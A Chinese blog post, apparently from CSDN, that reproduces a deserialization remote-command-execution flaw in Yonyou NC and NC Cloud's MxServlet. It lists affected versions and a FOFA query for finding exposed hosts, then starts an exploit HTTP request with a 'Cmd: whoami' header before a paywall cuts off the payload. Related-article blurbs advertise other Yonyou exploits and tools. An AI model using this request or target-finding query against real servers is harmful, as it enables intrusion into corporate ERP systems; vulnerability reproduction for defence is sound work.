用友NC及NC Cloud MxServlet反序列化漏洞复现

已于 2023-12-05 23:14:04 修改
阅读量2k 收藏 3
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-11-15 22:40:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134430713
版权

0x01 产品简介

  用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。

0x02 漏洞概述

    用友NC及NC Cloud系统存在反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行了反序列化操作,结合系统本身存在的反序列化利用链,可造成了命令执行,深入利用可随意操作服务器。

0x03 影响范围

  NC56、NC57、NC63、NC65、NCC1903、NCC1909、NCC2005

0x04 复现环境

FOFA:body="Client/Uclient/UClient.dmg"

0x05 漏洞复现 

Exp:

POST /servlet/~ic/nc.bs.framework.mx.MxServlet HTTP/1.1
Host: your-ip
Cmd: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 20434
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
订阅专栏
用友NC uapjs RCE漏洞(CNVD-C-2023-76801)
0xSec
06-29 1万+
用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器
用友 NCNC Cloud 多处序列RCE漏洞
0xSec
12-17 1477
用友 NCNC Cloud存在多处序列代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友ncc accept.jsp漏洞
Karka_的博客
03-16 917
accept.jsp源码中设置了白名单和黑名单的代码,但是白名单代码被注释掉了(默认被注释)只启用了黑名单。文件保存的函数fname又被定义为可以随便更改。那可以上传白名单内的文件名,然后通过传参将文件保存的名字进行修改。以及修改文件位置(具体源码不能够在平台展示出)
EtMi832#PeiQi-WIKI-POC#用友 NC XbrlPersistenceServlet序列2
07-25
用友 NC XbrlPersistenceServlet序列漏洞描述用友 NC XbrlPersistenceServlet序列漏洞漏洞影响用友NC漏洞
用友NC-Cloud文件上传漏洞_70
最新发布
fushuang333的博客
04-10 655
用友NC-Cloud文件上传漏洞,上传文件漏洞的影响可能会非常严重,上传可执行代码可能让攻击者获得服务器控制权。
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 8915
用友NC 漏洞汇总
Goby漏洞更新 | 用友NC com.ufsoft.iufo.jiuqi.JiuQiClientReqDispatch 序列命令执行漏洞
m0_46699477的博客
04-06 1004
用友NC是为集团与行业企业提供的全线管理软件产品。用友NC JiuQiClientReqDispatch路由,其中存在序列导致命令执行。
Java序列漏洞利用工具.zip
04-10
Java序列漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列序列过程中的安全问题。序列是将对象状态转换为可存储或传输的数据格式的过程,而序列则是将这些数据恢为原来的对象...
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
11-11
Java序列漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查...
shiro 序列漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:序列漏洞序列漏洞通常出在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Shiro序列漏洞检测工具
01-05
在Shiro的早期版本中,尤其是1.2.4及以下版本,存在一个严重的序列漏洞,这个漏洞可能导致远程代码执行(RCE)的风险,攻击者可以利用这个漏洞对目标系统进行非法操作。 序列漏洞通常出在应用程序接收到...
用友U8 Cloud 序列RCE漏洞
0xSec
11-08 3841
用友U8Cloud存在多处(FileManageServlet和LoginVideoServlet)序列漏洞,系统未将用户传入的序列数据进行过滤就直接执行序列操作,结合系统本身存在的序列利用链,最终造成远程代码执行。
用友全版本任意文件上传漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-26 1998
可以使用安全的文件验证机制,例如校验文件的魔术字节、文件头信息、文件结尾等,以确保上传的文件是预期的有效文件,并阻止上传恶意文件。限制文件上传:通过限制用户上传文件的类型、大小和目标路径,可以有效减少任意文件上传漏洞的风险。安全教育和培训:对系统管理员和用户进行安全教育和培训,提高其安全意识,让他们了解常见的安全威胁和最佳实践,以便正确地使用系统和应对潜在威胁。安全审计和监控:实施安全审计和监控机制,定期检查系统日志、访问日志和上传文件日志,及时发异常活动和潜在的攻击行为。利用此漏洞需要俩段poc。
用友NC Cloud存在前台远程命令执行漏洞
失心少年
07-21 577
NC Cloud用友推出的大型企业数字平台。 用友网络科技股份有限公司NC Cloud存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权
用友-NC-Cloud远程代码执行漏洞(你懂的)
weixin_43689708的博客
07-22 1536
用友NC Cloud大型企业数字平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体云平台,聚焦数智管理、数智经营、数智商业等三大企业数智转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智
史上最全!用友NC 漏洞汇总
2301_80115097的博客
12-01 876
参数可以读取下列所有文件,在某些情况下可以读取利用目录穿越可读取/etc/passwd等文件。版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务端控制权限。版本存在序列漏洞,攻击者可以执行系统命令,获取服务端权限。账户密码随便填,抓包将返回包0改为1,即可任意用户登录。在其中有个接口可以获取数据库账户密码,不过是老版本了。文件管理登录页面对用户名参数没有过滤,存在。ncDecode---用友nc数据库密码解密。存在远程命令执行漏洞,通过。用友NC-OA漏洞合集。
0day用友-NC-Cloud远程代码执行漏洞(全版本通杀)
失心少年
07-31 808
用友NC Cloud大型企业数字平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体云平台,聚焦数智管理、数智经营、数智商业等三大企业数智转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!FOFA:app=“用友-NC-Cloud
用友 NC mxservlet 序列漏洞
qq_39573664的博客
12-26 934
用友NC mxservlet处存在序列漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。
用友nc序列漏洞
12-21
用友NC序列漏洞是指用友NC软件存在的一种安全漏洞,攻击者可以利用该漏洞向受害者的系统中注入恶意代码,导致系统遭受攻击。该漏洞的成因主要是由于用友NC软件在序列过程中存在安全性缺陷,攻击者可以利用这一点来执行未经授权的代码。 攻击者通常会利用一些常见的序列漏洞利用技术,如序列注入、序列利用链等,来利用用友NC软件的漏洞进行攻击。通过构造恶意的序列数据,攻击者可以在受害者系统中执行恶意代码,包括但不限于执行任意命令、获取系统权限、窃取敏感信息等行为。 为了防范用友NC序列漏洞的攻击,用户和系统管理员可以采取一些措施,如及时安装官方发布的安全补丁、加强系统安全配置、限制用户权限、使用安全的序列序列机制等。另外,对于已知的漏洞利用技术,用户还可以利用防火墙、入侵检测系统等安全设备进行监测和阻断。 总之,要防范用友NC序列漏洞的攻击,需要用户和系统管理员密切关注安全动态,及时采取必要的安全措施来保护系统和数据的安全。同时,用友NC软件的开发者也应及时修这类漏洞,加强软件的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值